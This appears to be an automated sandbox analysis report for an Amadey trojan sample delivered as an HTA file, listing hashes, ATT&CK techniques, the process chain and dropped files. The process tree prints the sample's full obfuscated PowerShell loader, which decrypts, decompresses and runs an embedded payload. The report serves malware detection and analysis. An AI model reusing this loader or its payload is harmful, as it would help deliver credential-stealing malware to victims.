amadey | b48b6b38768b5e6003b7c9412f3aeeb0bf74126f01e356691b7508c13a1b7e68

General

Target

b (1).hta
Size

67KB
MD5

efdae93cb31dc54c3d87779cd4492a66
SHA1

28e7c6c449170c4f64b660dfa83049e34cea5c06
SHA256

b48b6b38768b5e6003b7c9412f3aeeb0bf74126f01e356691b7508c13a1b7e68
SHA512

8192f1eb0b3147fb6f01b369c9d67904c0a19168a512d8f6414822cdaa2da01ec322d7c8e3a105e897fb33c0150e195f1e2584c31ce84aa7a367d50454f9c091
SSDEEP

1536:KSe9JyrL3EZo/3mgZgqS2P/kPERYSGZ9hJbqbo+UKfy5R9q4sIhuS7:s9JMLTy5jq0h97

Score

10^/10

amadey discovery execution trojan

Malware Config

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Blocklisted process makes network request 1 IoCs

flow	pid	Process
15	4768	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	a.exe

Executes dropped EXE 5 IoCs

pid	Process
2224	a.exe
4904	Hkbsse.exe
5032	Hkbsse.exe
636	Hkbsse.exe
1160	Hkbsse.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1440	powershell.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\Hkbsse.job	a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hkbsse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1440	powershell.exe
1440	powershell.exe
4768	powershell.exe
4768	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	4768	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 4624 wrote to memory of 1440	4624	mshta.exe	88
PID 4624 wrote to memory of 1440	4624	mshta.exe	88
PID 4624 wrote to memory of 1440	4624	mshta.exe	88
PID 1440 wrote to memory of 4768	1440	powershell.exe	90
PID 1440 wrote to memory of 4768	1440	powershell.exe	90
PID 1440 wrote to memory of 4768	1440	powershell.exe	90
PID 4768 wrote to memory of 2224	4768	powershell.exe	98
PID 4768 wrote to memory of 2224	4768	powershell.exe	98
PID 4768 wrote to memory of 2224	4768	powershell.exe	98
PID 2224 wrote to memory of 4904	2224	a.exe	99
PID 2224 wrote to memory of 4904	2224	a.exe	99
PID 2224 wrote to memory of 4904	2224	a.exe	99

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\b (1).hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4624
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $qehKI = 'AAAAAAAAAAAAAAAAAAAAAKpb10JU5zqcFcVdH2geSO5Vp9uj/iqeY+0Qki/qmQT54wZbmcYZYVZOaEmW6jJnmrbPSh2F+WQCVgF51b1qJnbr4jXWbTueNjXiH2RHc2vUi73dzWKvn2mPC2cJ0WzhHHP/yYPeVKvSwKvPd44du2l+tiUac3MwJe/dcb4EHQ8PCtyYvNnL2/j/PCx9dDeUKNorCC1HPpUgA3ciLHn7RThEyJoG3xdM/zHvQcbu0/Fpi50GSpyll+wJCHspPe2vMpjbswOsgIWbv/ofkDPwccTAycpWCC0+kFjxMvhUrgWNNM98SPSgaUQ/JA7tm5bh7kZLdwgjc4Zc1DwOfWdzHuO8NrslSnbplJa6c3RfvVp6D/JPNCfTffzySoN2KcksVKJ4rpcgZJjYk8t/+Xi7o4hCUuYldmRgYdGgxaxGCiyf+2yG4gEBvJLkWQoqn1nsgCsh6kklCkWucmt8hmJtlAsMOXWEQjAagBi3bS7SDp3fAtLQ2QcHoBhFRA56EHVmWrvKJH+KIcOSwOLF/F2bMnLz7Vut2Ap7AXSqdp9OiEBUMlQAYlfvhS0EnsDltjV9exyhBXrJ1gnPmcXLcESKg28sZZ06kvcwEtbowP/y4BO7lPCqjbVF+rl/mjFdzO2ppg==';$HCHPRCW = 'T1JjU3RWVG5NalFZbk14Z2dEaUVRc2NaQWVSUlNRV1I=';$HPEewZLk = New-Object 'System.Security.Cryptography.AesManaged';$HPEewZLk.Mode = [System.Security.Cryptography.CipherMode]::ECB;$HPEewZLk.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$HPEewZLk.BlockSize = 128;$HPEewZLk.KeySize = 256;$HPEewZLk.Key = [System.Convert]::FromBase64String($HCHPRCW);$QdOvC = [System.Convert]::FromBase64String($qehKI);$PXXSjDtl = $QdOvC[0..15];$HPEewZLk.IV = $PXXSjDtl;$hvADggCjF = $HPEewZLk.CreateDecryptor();$WHUJrcPzX = $hvADggCjF.TransformFinalBlock($QdOvC, 16, $QdOvC.Length - 16);$HPEewZLk.Dispose();$SHPaFOQZ = New-Object System.IO.MemoryStream( , $WHUJrcPzX );$URyqaN = New-Object System.IO.MemoryStream;$lKJOTEDLn = New-Object System.IO.Compression.GzipStream $SHPaFOQZ, ([IO.Compression.CompressionMode]::Decompress);$lKJOTEDLn.CopyTo( $URyqaN );$lKJOTEDLn.Close();$SHPaFOQZ.Close();[byte[]] $VYaSrbX = $URyqaN.ToArray();$uISMRic = [System.Text.Encoding]::UTF8.GetString($VYaSrbX);$uISMRic | powershell -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1440
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
    3⤵
    - Blocklisted process makes network request
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Users\Admin\AppData\Roaming\a.exe
      "C:\Users\Admin\AppData\Roaming\a.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2224
    - - C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
        
        "C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4904

C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5032

C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:636

C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\687780306a\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c580727fc0a7a733ea6a446b67ca63f7

SHA1
ebdd57fca25df0f759dec07c5382d560df7600c2

SHA256
369ef9ccfc9923d44f390840e46cc948796bb79bec86644402608e9a8af80073

SHA512
2a1aba5dfe194d53ce71cafb94d147999968aa0a7e5bd1db069da62ab3e06f475af77c258532647dcb7370f4e12c188b99624fc5a9c7c44f196c98e9d2b12733

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
06ad34f9739c5159b4d92d702545bd49

SHA1
9152a0d4f153f3f40f7e606be75f81b582ee0c17

SHA256
474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

SHA512
c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

Download Submit
C:\Users\Admin\AppData\Local\Temp\392887640118

Filesize
81KB

MD5
84f5d99672707d0d4b007ee1508566de

SHA1
db6bd23cd1ab26d4ac984ee2298a263db0c9ec65

SHA256
9f562cc4a42569867ef407d0bb66bc507b36a97de80c7a9b4550ed3617198f44

SHA512
71d3c1c329be7e4aa2f5cc227c646d8204ac9b4a67cb6fc93e197c9d9f64ad10a2a7ddb25aa7bc0c9fea97cf224302fa953a49343b3ed090dd906afec9c2a9c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xn05m0ec.slb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\a.exe

Filesize
435KB

MD5
e7944fbef4e92cf6667d6750d317e28e

SHA1
78b4b41dd105c1804fd7a7045dd23f2ad2fbb11e

SHA256
fb6b67e04cddc3ddf8662d9798012cf24732c837c5c4eb44925823f6032bacb6

SHA512
0b53b3bbffd7178ebbd8c0b82f933169cf42bd1edd445d51c49663caee029c498f65274ddda28bc7a431fb54c527c206a59f99615c13cb2f48b3c018960366d7

Download Submit
C:\Users\Admin\AppData\Roaming\e13a1529d3734d\cred64.dll

Filesize
10KB

MD5
d6aed6cf38d26ed950f5b9236b01a001

SHA1
19dc3ca8f237e212efcb9a88146aa8bc0a21716d

SHA256
7a4b7b0057dbb578492d54afa092c6da1daaac1c9eda943626daece6b3bacf21

SHA512
0df9c57cba8832088ab832decba987418329bf2154f947e8fc3c4346481744d973431857a52f6feedd3d6f96367ab31bf9086a1fdc3c9d9228a14caf2f8465ae

Download Submit
memory/1440-20-0x0000000007660000-0x0000000007CDA000-memory.dmp

Filesize
6.5MB

Download
memory/1440-4-0x0000000070E40000-0x00000000715F0000-memory.dmp

Filesize
7.7MB

Download
memory/1440-7-0x00000000056B0000-0x0000000005716000-memory.dmp

Filesize
408KB

Download
memory/1440-17-0x0000000005820000-0x0000000005B74000-memory.dmp

Filesize
3.3MB

Download
memory/1440-18-0x0000000005D10000-0x0000000005D2E000-memory.dmp

Filesize
120KB

Download
memory/1440-19-0x00000000062A0000-0x00000000062EC000-memory.dmp

Filesize
304KB

Download
memory/1440-0-0x0000000070E4E000-0x0000000070E4F000-memory.dmp

Filesize
4KB

Download
memory/1440-21-0x00000000061E0000-0x00000000061FA000-memory.dmp

Filesize
104KB

Download
memory/1440-1-0x00000000023F0000-0x0000000002426000-memory.dmp

Filesize
216KB

Download
memory/1440-2-0x0000000004EA0000-0x00000000054C8000-memory.dmp

Filesize
6.2MB

Download
memory/1440-54-0x0000000070E40000-0x00000000715F0000-memory.dmp

Filesize
7.7MB

Download
memory/1440-3-0x0000000070E40000-0x00000000715F0000-memory.dmp

Filesize
7.7MB

Download
memory/1440-6-0x0000000005640000-0x00000000056A6000-memory.dmp

Filesize
408KB

Download
memory/1440-36-0x0000000070E4E000-0x0000000070E4F000-memory.dmp

Filesize
4KB

Download
memory/1440-37-0x0000000070E40000-0x00000000715F0000-memory.dmp

Filesize
7.7MB

Download
memory/1440-5-0x0000000004D60000-0x0000000004D82000-memory.dmp

Filesize
136KB

Download
memory/4768-35-0x0000000008040000-0x00000000085E4000-memory.dmp

Filesize
5.6MB

Download
memory/4768-34-0x0000000006ED0000-0x0000000006EF2000-memory.dmp

Filesize
136KB

Download
memory/4768-33-0x00000000071B0000-0x0000000007246000-memory.dmp

Filesize
600KB

Download
memory/4768-32-0x0000000006D10000-0x0000000006D86000-memory.dmp

Filesize
472KB

Download
memory/4768-31-0x0000000006140000-0x0000000006184000-memory.dmp

Filesize
272KB

Download

Analysis

Sharing